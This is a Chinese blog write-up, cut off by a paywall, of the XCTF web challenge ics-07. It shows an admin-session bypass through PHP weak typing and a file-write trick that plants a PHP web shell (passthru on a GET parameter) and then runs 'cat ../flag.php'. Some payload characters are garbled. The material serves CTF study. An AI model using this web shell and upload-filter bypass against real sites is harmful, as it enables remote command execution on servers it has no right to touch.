XCTF的ics-07

最新推荐文章于 2023-07-24 23:19:02 发布
最新推荐文章于 2023-07-24 23:19:02 发布
阅读量2.3k 收藏 7
点赞数 3
分类专栏: 代码审计 文件过滤 文章标签: xctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45552960/article/details/102777514
版权
本文详细介绍了XCTF中ics-07题目的解题过程,涉及浮点值绕过、文件上传漏洞利用、Apache解析漏洞等技术。首先通过浮点值和文件后缀限制的绕过,获取admin权限并上传文件。接着,尝试利用Apache的目录结构特性绕过文件后缀限制,成功上传可执行文件并获取shell,最终找到flag。
摘要由CSDN通过智能技术生成

三种解题方法

(1)
步骤
1.进入题目后,查看源码进行审计,第一步需要进行绕过,获取到admin的session。

2.绕过要注意的三个点为:

​ (1)floatval($ _ GET [id])!==‘1’ //浮点不为1

​ (2)substr($ _ GET [id],-1)==='9‘ //id最后一位为9

​ (3)Mysql查询结果限制,id不能过大,

3.构建后exp为http://111.198.29.45:43136/index.php?page=&id=1/9&submit=提交查询#,可得到admin,如图所示
在这里插入图片描述
4.然后是文件过滤,要注意的三个点为:

​ (1) f i l e n a m e = " b a c k u p / " . filename = "backup/". filename="backup/".file; //目录为假目录,传入file时,加上一个…/

​ (2)’/.+.ph(p[3457]?|t|tml)$/i’ //正则过滤文件只匹配最后一个点的后缀,可以写入两次.php

​ (3)真实上传目录为upload

5.构建exp为file=…/123.php/1.php/…&con=<?php passthru($_GET[bash]);?>,用post方式进行传递

6.访问http://111.198.29.45:38479/uploaded/123.php?bash=cat …/flag.php,查看源码,获得flag,如图所示
在这里插入图片描述
(2)

对源码进行审计
在这里插入图片描述
这段说当session为admin时可以上传文件,文件会保存到uploaded/backup目录下,但是使用黑名单过滤掉了ph(p[3457]?|t|tml)这些后缀。
在这里插入图片描述
这段说当传入的id值浮点值不能为1,但是id的最后一个数必须为9,session才能为admin。

利用php弱类型语言的特性可轻松绕过这一限制。

如下:

最低0.47元/天 解锁文章
小 白 渣
关注
专栏目录
XCTF-HW-pipeline附件
11-09
附件
XCTF Web 记录(ics-07
ximo的博客
03-10 114
ics-07 打开页面: 直接就有view-source,打开,一共三部分: <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'); }else
Web安全攻防世界09 ics-07XCTF
weixin_42789937的博客
01-29 1031
Web安全攻防世界09 ics-07XCTF),友情提示:攻防世界最近的答题环境不太稳定,我这篇没有做到最后一步...
【攻防世界WEB】难度五星15分进阶题:ics-07
07-24 596
【攻防世界WEB】五星15分
攻防世界web进阶区ics-07详解
hxhxhxhxx的博客
08-07 1563
攻防世界web进阶区ics-07详解题目详解floatvalsubstr 题目 当然又是熟悉的界面,熟悉的ics题目,熟悉的只能点击一个页面 详解 这里进来有一个view-source 点击看看 是一堆代码。我们进行尝试审计 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]
ICS-07
weixin_52921802的博客
12-16 521
输入、输出 本章输入设备选择键盘,输出设备选择显示器 输入、输出的基本概念 设备寄存器(decice register):即使最简单的I/O设备,也至少包含两个寄存器: 一个用来保存跟计算机之间传输的数据; 另一个用来指示当前设备的状态信息。 内存映射I/O与专用I/O指令 指令访问I/O设备寄存器时,需要明确指明目标寄存器。通常有两种实现方法 采用专门的I/O指令来访问,即专用I/O指令 采用内存操作指令来完成I/O操作,即内存映射I/O 专用I/O指令就是设计好的操作码来确定其行为
【愚公系列】2023年06月 攻防世界-Web(ics-07
时光隧道
06-15 4156
php是一种弱类型语言,意味着在变量的赋值和使用过程中,不需要显式地定义变量的类型。php会根据变量的值自动判断变量的数据类型。floatval是php中的一个内置函数,用于将变量转换为浮点数型数据。如果变量的值不能被转换成数字,则返回0。3.14在这个例子中,$num变量被赋值为字符串"3.14",但在使用floatval函数将其转换为浮点型数据后,$float_num变量中存储的值为3.14。preg_match是php中的一个正则表达式匹配函数,用于检索字符串中的特定模式。
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
ics-07—CTF
qq_40646572的博客
04-16 2238
审题 打开链接地址显示如下: 点击项目管理链接,转到目标网页 发现页面有一个view-source按钮(一开始没发现可以点击,打开源代码的时候发现,这是一个链接地址。) view_source页面代码如下: 通过代码审计,发现session会话要有admin用户的信息,才可以进行文件上传的操作。 那么首先需要在session会话中获取admin用户的身份,通过下面的代码审计,发现可以利用id 这个参数。 admin身份绕过 首先看到此处的代码,想着能不能使用sql注入的方式绕过,sql注入没能成功.
攻防世界----ics-07
qq_44418229的博客
07-26 445
攻防世界---ics-07 分析源码+正则
WEB:ics-07
sleepywin的博客
07-24 222
如果传入的参数page的值不是index.php,则包含flag.php,否则重定向到?mysql_real_escape_string() :转义 SQL 语句中使用的字符串中的特殊字符。fwrite () 函数:向文件写入字符串,成功返回写入的字符数,否则返回 FALSE。mysql_fetch_object() :从结果集(记录集)中取得一行作为对象。show_source()函数:对文件进行语法高亮显示。chdir() 函数:改变当前的目录,需规定新目录。floatval():返回变量的浮点值。
[XCTF]ics-07
sGanYu
09-01 1154
工控云管理系统项目管理页面解析漏洞 打开链接,一个工控云管理系统,随意点击旁边的菜单,发现只有云平台项目管理中心可以进入 初始页面只有一个,可以找到一个view-source,点进去可以看到源码 考点:php代码审计、中间件解析漏洞、上传一句话木马连接 PHP代码审计 代码一共分为三部分 第一部分:提交的get参数page不为index.php即可 <?php session_start();//在用户登陆成功后,将用户特定标识存储到 sessio...
Web(ics-07)
m0_56010012的博客
03-23 3160
题目描述:工控云管理系统项目管理页面解析漏洞 查看view-source下三段代码 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php');
ics-07
CN天狼
03-01 141
ics-07
攻防世界 web 进阶 ics-07
weixin_42499640的博客
08-11 4605
工控云管理系统项目管理页面解析漏洞 /index.php 看到view-source 看一下源码 <?php if ($_SESSION['admin']) { $con = $_POST['con']; $file = $_POST['file']; $filename = "backup/".$file; if(pre...
XCTF-高手进阶区:ics-07
1stPeak's Blog
04-14 601
题目: 发现view-source <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <body> <?php session_start...
XCTF-ics-07
臭nana的博客
12-17 463
题目描述:工控云管理系统项目管理页面解析漏洞 打开题目网址,点击项目管理 进来之后,发现页面下方有一个view-source 点击之后得到页面源码 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title&...
web-ics-05
最新发布
07-28
- *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值